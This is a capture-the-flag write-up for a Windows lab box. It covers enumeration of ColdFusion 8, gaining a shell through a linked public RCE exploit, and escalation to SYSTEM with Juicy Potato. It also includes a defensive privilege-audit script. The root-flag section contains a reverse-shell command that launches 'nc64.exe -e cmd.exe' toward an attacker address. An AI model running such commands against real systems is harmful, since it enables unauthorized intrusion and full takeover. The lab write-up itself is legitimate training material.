Introduction

OS: Windows
Difficulty: Easy
Points: 0
Release: 22 Mar, 2017
IP: 10.10.10.11

Enumeration

Nmap scan result

Nmap scan report for 10.10.10.11
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.31 seconds

Browsing port 8500 returns a directory listing from the JRun web server with two folders:

  • CFIDE/
  • cfdocs/
$ curl http://10.10.10.11:8500 -i
HTTP/1.0 200 OK
Date: Thu, 14 Sep 2023 17:32:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server

<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ
</pre><hr></html>

User Flag

Further enumeration identifies the application on port 8500 as Adobe ColdFusion 8.
A public RCE exploit exists for this version: https://www.exploit-db.com/exploits/50057
Using the exploit we get a shell as the user tolis:

C:\>whoami
whoami
arctic\tolis

C:\>dir "user.txt" /s
dir "user.txt" /s
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8

Directory of C:\Users\tolis\Desktop

14/09/2023 08:28 34 user.txt
1 File(s) 34 bytes

Got the user flag.

Root Flag

The tolis user account has SeImpersonatePrivilege enabled:

C:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled, it can be used to escalate local privileges to SYSTEM. Normally these privileges are assigned only to service accounts, administrators and the local SYSTEM account, that is, high-integrity elevated users.
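As an added defensive check (not part of the original writeup): a small Python script that parses `whoami /priv` output and reports whether an account holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so service accounts such as the one running ColdFusion can be audited. The tolis output above and a plain standard-user output are embedded as constructed samples.

```python
# Privileges that, when held, allow escalation to SYSTEM via token impersonation.
TOKEN_IMPERSONATION_PRIVS = frozenset({"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"})

# Constructed sample: the `whoami /priv` output of the tolis account shown above.
TOLIS_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample: an ordinary interactive user, for comparison.
STANDARD_USER_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    # Data rows follow the '====' separator. Privilege names and the State column
    # never contain spaces, so the first and last tokens of a row are name and
    # state; the description (which does contain spaces) sits in between.
    privs = {}
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("=")  # skip heading lines up to the separator
            continue
        parts = line.split()
        if len(parts) >= 3:  # name, at least one description word, state
            privs[parts[0]] = parts[-1]
    return privs


def token_impersonation_findings(text):
    """Sorted (privilege, state) pairs for held privileges that enable escalation.
    'Disabled' only means not currently enabled in the token: the privilege is
    still assigned and the process can enable it itself, so it is reported too."""
    privs = parse_whoami_priv(text)
    return sorted((p, s) for p, s in privs.items() if p in TOKEN_IMPERSONATION_PRIVS)
```

An empty result means the account does not hold either privilege; anything else is a finding regardless of the reported state.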

To escalate to SYSTEM we use Juicy Potato: https://github.com/ohpe/juicy-potato/releases

Command used to get the shell:
JuicyPotato.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p c:\windows\system32\cmd.exe -a "/c c:\users\tolis\desktop\nc64.exe -e cmd.exe 10.10.1x.xx 1234" -t *
After executing the above command we get a shell as nt authority\system:

C:\>whoami
nt authority\system

C:\>type users\administrator\desktop\root.txt
dcf80b472exxxxx.....

Got the root flag.